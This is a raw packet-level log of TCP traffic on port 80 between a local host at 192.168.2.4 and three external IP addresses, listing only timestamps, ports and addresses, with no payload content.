Jan 14, 2022 00:16:14.300261974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.300364971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.300450087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.300591946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.300674915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.300781012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.300880909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.300988913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.301084042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.301178932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.301287889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.303877115 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.303911924 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.303936958 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.304088116 CET	80	49919	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.305179119 CET	49921	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:14.311526060 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.320593119 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.325249910 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.326194048 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.326236010 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.326273918 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.326303959 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.326312065 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.326351881 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.326368093 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.326409101 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.326450109 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.326471090 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.326489925 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.326529980 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.326544046 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.326570034 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.326631069 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.345031977 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.346410990 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.346518040 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.346546888 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.346573114 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.356844902 CET	80	49921	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:14.356996059 CET	49921	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:14.357054949 CET	49921	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:14.358690023 CET	49921	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:14.361963987 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.361993074 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.363555908 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.363594055 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.363619089 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.363645077 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.363667965 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.364295959 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.378360987 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.378400087 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.378432035 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.378458977 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.378582954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.382021904 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.382431030 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.382457972 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.383265972 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.383297920 CET	80	49919	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.383378029 CET	49919	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.385351896 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.401077032 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401118040 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401156902 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401181936 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.401196003 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401235104 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401249886 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.401278973 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401325941 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401331902 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.401365995 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401407003 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401420116 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.401443958 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401484013 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401519060 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.401524067 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401561975 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401577950 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.401601076 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401640892 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401678085 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401681900 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.401719093 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401731968 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.401756048 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401793957 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401808023 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.401839018 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.401896000 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.409001112 CET	80	49921	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:14.410193920 CET	80	49921	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:14.438539982 CET	80	49921	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:14.438697100 CET	49921	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:14.438726902 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.438812017 CET	49921	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:14.465958118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.466104984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.466209888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.466315031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.466418982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.466523886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.466624975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.467025042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.467158079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.467250109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.467336893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.467427015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.467513084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.467601061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.467696905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.467833042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.467922926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.468009949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.468094110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.468178988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.468266010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.468353033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.468439102 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.468525887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.468612909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.468725920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.468838930 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.477005959 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477049112 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477087975 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477122068 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.477127075 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477164984 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477200031 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.477205038 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477246046 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477263927 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.477283955 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477323055 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477333069 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.477377892 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477422953 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477446079 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.477463961 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477500916 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477516890 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.477541924 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477580070 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477602005 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.477608919 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477648020 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477684021 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.477685928 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477725029 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477739096 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.477763891 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477802038 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477818966 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.477840900 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477905989 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.477905989 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477945089 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.477982998 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.478022099 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.478022099 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.478058100 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.478085995 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.478096962 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.478137970 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.478152037 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.478177071 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.478215933 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.478235006 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.478251934 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.478291035 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.478305101 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.478328943 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.478364944 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.478391886 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.478403091 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.478441000 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.478454113 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.478480101 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.478518963 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.478533983 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.478557110 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.478631973 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.490591049 CET	80	49921	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:14.531658888 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.531691074 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.531716108 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.531742096 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.531768084 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.531793118 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.531848907 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.553989887 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554042101 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554080963 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554116964 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.554121017 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554160118 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554199934 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554204941 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.554240942 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554255009 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.554280043 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554321051 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554344893 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.554362059 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554399967 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554439068 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554455042 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.554477930 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554482937 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.554517031 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554559946 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554569006 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.554598093 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554636955 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554647923 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.554677010 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554714918 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554728031 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.554759979 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554785013 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554825068 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554828882 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.554862976 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554863930 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.554900885 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554939032 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.554943085 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.554976940 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555018902 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555025101 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.555058956 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555095911 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555102110 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.555135012 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555176973 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555188894 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.555213928 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555253029 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555258989 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.555290937 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555330992 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555335999 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.555371046 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555407047 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555418015 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.555448055 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555485964 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555490971 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.555522919 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555562019 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555567026 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.555599928 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555638075 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555644035 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.555679083 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555715084 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555721998 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.555752993 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555792093 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555799007 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.555829048 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.555871010 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.620246887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.620379925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.620475054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.620569944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.620661020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.621054888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.621151924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.621251106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.621337891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.621428967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.621520996 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.621613979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.621743917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.621881008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.621990919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.622098923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.622231007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.622304916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.622400999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.622522116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.622591019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.622687101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.622818947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.622903109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.623017073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.623084068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.623172998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.623294115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.623356104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.623451948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.623557091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.623639107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.623747110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.623826027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.623935938 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.624015093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.624108076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.624190092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.624279022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.624372005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.624444962 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.624535084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.624619007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.624707937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.624795914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.624881029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.624963999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.625047922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.625138044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.625221968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.625307083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.625389099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.625478029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.625576019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.625658989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.630579948 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.630630016 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.630666971 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.630688906 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.630708933 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.630749941 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.630754948 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.630786896 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.630825996 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.630831957 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.630865097 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.630912066 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.630918026 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.630963087 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631011009 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.631011963 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631052971 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631092072 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631094933 CET	49920	80	192.168.2.4	141.8.194.74
